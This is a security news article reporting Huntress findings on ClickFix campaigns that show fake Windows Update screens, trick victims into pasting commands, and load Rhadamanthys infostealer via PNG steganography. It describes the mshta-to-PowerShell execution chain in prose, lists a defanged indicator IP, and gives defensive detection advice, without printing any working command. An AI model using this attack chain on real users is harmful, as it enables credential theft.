Article Details

Fresh ClickFix attacks use Windows Update trick-pics to steal credentials. Poisoned PNGs contain malicious code. A fresh wave of ClickFix attacks is using fake Windows update screens to trick victims into downloading infostealer malware. ClickFix is a type of social engineering technique that tricks users into running malicious commands on their own machines, typically using fake fixes or I-am-not-a-robot prompts. These types of attacks have surged over the past year, with both government-sponsored spies and cybercriminal gangs deploying this technique to deliver malware. According to Microsoft, ClickFix is now the most common initial access method for attackers. Recent ClickFix attacks are moving away from the robot-check lures and instead using "highly convincing" phony Windows update screens, according to Huntress security analysts Ben Folland and Anna Pham. In another new twist, the malware slingers use a steganographic loader to deliver infostealing malware, including Rhadamanthys, by encoding malicious code directly into the pixel data of PNG images and then using specific color channels to reconstruct and decrypt the malware in memory. This technique also helps the malicious payloads to evade signature-based detection. Since early October, Huntress threat hunters have spotted a few clusters of activity using Windows Update as the ClickFix lure. One involved this IP address: 141.98.80[.]175, so defenders should keep an eye out for any traffic originating from that one. These campaigns start with victims visiting a malicious website that causes their browsers to enter full-screen mode and display a blue Windows Update screen like this one shared on social media. If users fall for the scam, they’re urged to install a “critical security update” via the typical ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command. Running the command kicks off a multi-stage execution chain that begins with an mshta.exe command which contains a URL with an IP address, where the second octet is always hex-encoded. This runs PowerShell code that contains a .NET assembly, which is dynamically decrypted and reflectively loaded. And that leads to the deployment of another .NET payload – a steganographic loader that extracts Donut-packed shellcode hidden inside the pixel data of PNG images. Both of these Windows Update ClickFix lures ultimately load Rhadamanthys infostealing malware on the victims' machines. That evil code swipes their login credentials. Huntress doesn’t know who is behind these campaigns but noted the source code of the Windows Update lure site contains comments in Russian. Plus, the researchers conducted their analysis both before and after the Operation Endgame law enforcement takedowns announced November 13 that targeted the Rhadamanthys infrastructure. "As of November 19, multiple active domains continue to host the Windows Update Lure page associated with the Rhadamanthys campaign," the Huntress duo wrote. "All of these lures point to the same hex-encoded URL structure previously linked to the deployment of Rhadamanthys, although it appears this payload is no longer being hosted." Organizations can defend against ClickFix attacks by blocking the Windows Run box and training employees on how the ClickFix technique works - real CAPTCHA or Windows Update won't ever require a user to paste and run commands. Additionally, use endpoint detection and response tools to monitor for explorer.exe-spawning mshta.exe, powershell.exe, or other binaries with unexpected command lines.